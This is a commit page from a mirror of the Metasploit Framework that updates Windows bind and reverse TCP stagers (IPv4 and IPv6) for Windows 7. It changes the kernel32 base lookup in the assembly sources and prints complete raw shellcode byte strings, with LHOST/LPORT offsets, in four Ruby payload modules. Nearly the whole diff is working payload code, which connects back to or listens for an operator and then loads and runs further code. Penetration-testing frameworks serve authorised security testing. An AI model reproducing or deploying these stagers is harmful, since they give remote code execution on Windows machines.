infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adds Windows 7 support for the primary stagers: http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html 

git-svn-id: file:///home/svn/framework3/trunk@6677 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-06-20 04:35:44 +00:00
parent 5a4ad7c1c9
commit 1fba3f678b
8 changed files with 77 additions and 72 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm vendored
View File

@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA

5
external/source/shellcode/windows/stager_bind_tcp_nx.asm vendored
View File

@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA

5
external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm vendored
View File

@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA

5
external/source/shellcode/windows/stager_reverse_tcp_nx.asm vendored
View File

@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA

32
modules/payloads/stagers/windows/bind_ipv6_tcp.rb
View File

@ -38,7 +38,7 @@ module Metasploit3
{
'Offsets' =>
{
'LPORT' => [ 253+1, 'n' ],
'LPORT' => [ 255+1, 'n' ],
},
'Payload' =>
"\xfc"+
@ -48,22 +48,22 @@ module Metasploit3
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"+
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+
"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55"+
"\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55\x2c\x89"+
"\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff\xff\x89"+
"\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55\x28\x53"+
"\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1"+
"\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00"+
"\x00\x53\x57\xff\x55\x18\xff\xd3"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
"\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
"\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+
"\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49"+
"\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+
"\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+
"\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+
"\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\x68\x02\x02\x00\x00"+
"\xff\x55\x30\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x17\xff\x55"+
"\x2c\x89\xc7\x6a\x00\x31\xc9\x51\x51\x51\x51\x51\x68\x17\x00\xff"+
"\xff\x89\xe1\x6a\x1c\x51\x57\xff\x55\x24\x31\xdb\x53\x57\xff\x55"+
"\x28\x53\x53\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56\xc1\xe6\x06"+
"\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00"+
"\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3"
}
))
end
end
end

32
modules/payloads/stagers/windows/bind_tcp.rb
View File

@ -34,7 +34,7 @@ module Metasploit3
{
'Offsets' =>
{
'LPORT' => [ 245, 'n' ],
'LPORT' => [ 247, 'n' ],
},
'Payload' =>
"\xfc"+
@ -44,22 +44,22 @@ module Metasploit3
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"+
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49\x86\x49"+
"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"+
"\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"+
"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"+
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"+
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"+
"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"+
"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7\xff\x55"+
"\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff"+
"\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18"+
"\xff\xd3"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
"\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
"\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00"+
"\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xe7\x79\xc6\x79\xe5\x49"+
"\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed"+
"\xfc\x3b\x77\x73\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7"+
"\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff"+
"\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30"+
"\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31"+
"\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55"+
"\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x53\x57\x89\xc7"+
"\xff\x55\x1c\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a"+
"\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68\x00\x10\x00\x00\x53\x57\xff"+
"\x55\x18\xff\xd3"
}
))
end
end
end

35
modules/payloads/stagers/windows/reverse_ipv6_tcp.rb
View File

@ -39,9 +39,9 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 246+1, 'ADDR6' ],
'LPORT' => [ 240+1, 'n' ],
'SCOPEID' => [ 262+1, 'V' ]
'LHOST' => [ 248+1, 'ADDR6' ],
'LPORT' => [ 242+1, 'n' ],
'SCOPEID' => [ 264+1, 'V' ]
},
'Payload' =>
"\xfc" +
@ -51,19 +51,20 @@ module Metasploit3
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+
"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+
"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"+
"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"+
"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"+
"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"+
"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
"\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
"\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+
"\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+
"\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+
"\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+
"\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+
"\x2b\x27\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50"+
"\x6a\x06\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00"+
"\x17\x00\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00"+
"\x02\x1b\x63\xff\xfe\x98\xbf\x36\x00\x00\x00\x00\x59\x6a\x1c\x51"+
"\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56"+
"\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff"+
"\xd3"
}
))
register_options(
@ -72,4 +73,4 @@ module Metasploit3
], self.class)
end
end
end

30
modules/payloads/stagers/windows/reverse_tcp.rb
View File

@ -34,8 +34,8 @@ module Metasploit3
{
'Offsets' =>
{
'LHOST' => [ 231, 'ADDR' ],
'LPORT' => [ 238, 'n' ],
'LHOST' => [ 233, 'ADDR' ],
'LPORT' => [ 240, 'n' ],
},
'Payload' =>
"\xfc" +
@ -45,20 +45,20 @@ module Metasploit3
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"+
"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"+
"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"+
"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"+
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"+
"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"+
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"+
"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"+
"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"+
"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56"+
"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57"+
"\xff\x55\x18\xff\xd3"
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10\x53"+
"\x68\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff"+
"\xd6\x81\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00"+
"\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9"+
"\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32"+
"\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a"+
"\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2"+
"\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50"+
"\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22"+
"\x11\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6"+
"\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56"+
"\x53\x57\xff\x55\x18\xff\xd3"
}
))
end
end
end